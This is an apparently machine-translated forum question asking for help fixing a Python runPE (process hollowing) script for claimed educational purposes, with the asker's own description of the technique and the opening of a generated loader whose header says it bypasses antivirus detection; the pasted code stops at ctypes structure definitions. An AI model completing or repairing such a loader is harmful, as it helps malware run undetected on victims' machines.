我必须学习如何在python下实现runPE(出于教育目的)。在
但是,由于我对这个领域了解不多,所以我试图修改源代码以使它们能够正常工作(因为实际上,在github上发布的python下的所有runPE项目目前都无法工作)。在So I decided to train under the project: https:
//github.com/oueldz4/runpe
首先,为了跟你说清楚,我需要和你谈谈这是什么。在RunPE is the generic name of a technique used by many malware.
This technique consists in launching a new process in pause, then
replacing the memory contents of the executable in pause and finally
to release the process. This allows you to run a complete executable
without having to put it on the disk. This avoids detection by the
antivirus.
所以,正如你所看到的,这种方法被用来感染计算机而不被反病毒检测到。然而,就我而言,我希望实现这个教育项目。安全的世界让我很感兴趣,了解这些机制确实有助于避免在互联网上下载文件而感染自己。在
让我们回到我的问题上来。在
加密程序最终输出以下代码:#!/usr/bin/env python
# This script uses the runpe technique to bypass AV detection
# The payload it contains, is encrypted each time with a random key
# INSTALL pefile and ctypes packages
from itertools import cycle, izip
import sys, pefile
import ctypes
BYTE = ctypes.c_ubyte
WORD = ctypes.c_ushort
DWORD = ctypes.c_ulong
LPSTR = ctypes.c_char_p
HANDLE = ctypes.c_void_p
CREATE_SUSPENDED = 0x0004
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40
class PROCESS_INFORMATION(ctypes.Structure):
_fields_ = [
('hProcess', HANDLE),
('hThread', HANDLE),
('dwProcessId', DWORD),
('dwThreadId', DWORD),
]
class STARTUPINFO(ctypes.Structure):
_fields_ = [
('cb', DWORD),
('lpReserved', LPSTR),
('lpDesktop&#